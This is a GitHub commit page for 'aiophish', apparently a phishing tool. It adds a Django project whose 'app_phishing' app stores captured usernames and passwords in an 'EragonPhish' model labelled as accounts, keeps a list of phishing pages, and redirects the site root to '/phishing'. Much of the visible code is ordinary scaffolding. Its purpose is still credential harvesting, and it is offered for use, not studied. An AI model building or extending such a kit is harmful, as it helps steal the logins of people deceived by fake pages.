Skip to content

Commit

Permalink
v2.6
Browse files Browse the repository at this point in the history
  • Loading branch information
Eragon Security committed Dec 21, 2020
1 parent 10586e2 commit 453324d
Show file tree
Hide file tree
Showing 1,907 changed files with 182,131 additions and 1,571 deletions.
1,571 changes: 0 additions & 1,571 deletions aiophish

This file was deleted.

1,446 changes: 1,446 additions & 0 deletions aiophish.sh

Large diffs are not rendered by default.

Empty file added eragonprojects/app/__init__.py
Empty file.
Binary file not shown.
Binary file added eragonprojects/app/__pycache__/admin.cpython-38.pyc
Binary file not shown.
Binary file added eragonprojects/app/__pycache__/models.cpython-38.pyc
Binary file not shown.
Binary file added eragonprojects/app/__pycache__/urls.cpython-38.pyc
Binary file not shown.
Binary file added eragonprojects/app/__pycache__/views.cpython-38.pyc
Binary file not shown.
3 changes: 3 additions & 0 deletions eragonprojects/app/admin.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,3 @@
from django.contrib import admin

# Register your models here.
5 changes: 5 additions & 0 deletions eragonprojects/app/apps.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,5 @@
from django.apps import AppConfig


class AppConfig(AppConfig):
name = 'app'
Empty file.
Binary file not shown.
3 changes: 3 additions & 0 deletions eragonprojects/app/models.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,3 @@
from django.db import models

# Create your models here.
3 changes: 3 additions & 0 deletions eragonprojects/app/tests.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,3 @@
from django.test import TestCase

# Create your tests here.
8 changes: 8 additions & 0 deletions eragonprojects/app/urls.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,8 @@
from django.urls import path
from . import views

app_name = "app"

urlpatterns = [
path("", views.inicio_principal, name="inicio_principal")
]
5 changes: 5 additions & 0 deletions eragonprojects/app/views.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,5 @@
from django.shortcuts import render, redirect

# Create your views here.
def inicio_principal(request):
return redirect('/phishing')
Empty file.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
6 changes: 6 additions & 0 deletions eragonprojects/app_phishing/admin.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,6 @@
from django.contrib import admin
from .models import EragonPhish, ListaDePaginas

# Register your models here.
admin.site.register(EragonPhish)
admin.site.register(ListaDePaginas)
5 changes: 5 additions & 0 deletions eragonprojects/app_phishing/apps.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,5 @@
from django.apps import AppConfig


class AppConfig(AppConfig):
name = 'app'
28 changes: 28 additions & 0 deletions eragonprojects/app_phishing/migrations/0001_initial.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,28 @@
# Generated by Django 3.1.4 on 2020-12-12 20:19

from django.db import migrations, models


class Migration(migrations.Migration):

initial = True

dependencies = [
]

operations = [
migrations.CreateModel(
name='EragonPhish',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('username', models.TextField()),
('password', models.TextField()),
('tiempo', models.DateTimeField(auto_now_add=True)),
('slug', models.SlugField()),
],
options={
'verbose_name': 'Cuenta',
'verbose_name_plural': 'Cuentas',
},
),
]
23 changes: 23 additions & 0 deletions eragonprojects/app_phishing/migrations/0002_auto_20201213_2141.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,23 @@
# Generated by Django 3.1.4 on 2020-12-13 21:41

from django.db import migrations, models


class Migration(migrations.Migration):

dependencies = [
('app_phishing', '0001_initial'),
]

operations = [
migrations.AlterField(
model_name='eragonphish',
name='password',
field=models.CharField(max_length=500),
),
migrations.AlterField(
model_name='eragonphish',
name='username',
field=models.CharField(max_length=500),
),
]
23 changes: 23 additions & 0 deletions eragonprojects/app_phishing/migrations/0003_auto_20201213_2150.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,23 @@
# Generated by Django 3.1.4 on 2020-12-13 21:50

from django.db import migrations


class Migration(migrations.Migration):

dependencies = [
('app_phishing', '0002_auto_20201213_2141'),
]

operations = [
migrations.RenameField(
model_name='eragonphish',
old_name='password',
new_name='passw',
),
migrations.RenameField(
model_name='eragonphish',
old_name='username',
new_name='user',
),
]
20 changes: 20 additions & 0 deletions eragonprojects/app_phishing/migrations/0004_listadepaginas.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,20 @@
# Generated by Django 3.1.4 on 2020-12-14 17:24

from django.db import migrations, models


class Migration(migrations.Migration):

dependencies = [
('app_phishing', '0003_auto_20201213_2150'),
]

operations = [
migrations.CreateModel(
name='ListaDePaginas',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.TextField()),
],
),
]
Empty file.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
25 changes: 25 additions & 0 deletions eragonprojects/app_phishing/models.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,25 @@
from django.db import models

# Create your models here.
class EragonPhish(models.Model):
user = models.CharField(max_length=500, null=False, blank=False)
passw = models.CharField(max_length=500, null=False, blank=False)
tiempo = models.DateTimeField(auto_now_add=True)
slug = models.SlugField()

def __str__(self):
return self.slug

class Meta:
verbose_name = "Cuenta"
verbose_name_plural = "Cuentas"

class ListaDePaginas(models.Model):
name = models.TextField()

def __str__(self):
return self.name

def get_absolute_url(self):
return self.name

Loading

0 comments on commit 453324d

Please sign in to comment.